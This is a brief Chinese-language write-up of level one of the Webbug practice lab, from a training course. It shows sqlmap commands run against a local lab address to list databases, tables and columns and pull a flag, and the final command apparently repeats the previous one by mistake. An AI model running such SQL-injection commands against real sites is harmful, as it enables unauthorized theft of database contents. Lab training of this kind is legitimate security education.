Webbug靶场第一关

华盟学院山东省第二期线下学习计划

大家好,我是sean,今天给大家带来的是webbug的靶场第一关。

靶场环境:2003 phptudy

用到的打靶工具:sqlmap

首先打开靶场

Webbug靶场第一关  

用sqlmap来注入获取下数据库名

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" --current-db

Webbug靶场第一关 

查到数据库名称是pentesterlab,接下来在获取数据库的表名

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --table

Webbug靶场第一关

当看到flag那就基本确定就是他了,接下来在看下这个表的字段

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

Webbug靶场第一关

看到两个字段的内容,然后直接爆flag

root@kali:~# sqlmap -u "http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

Webbug靶场第一关

www.idc126.com

第一次搞,没什么经验,自己折腾吧。

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论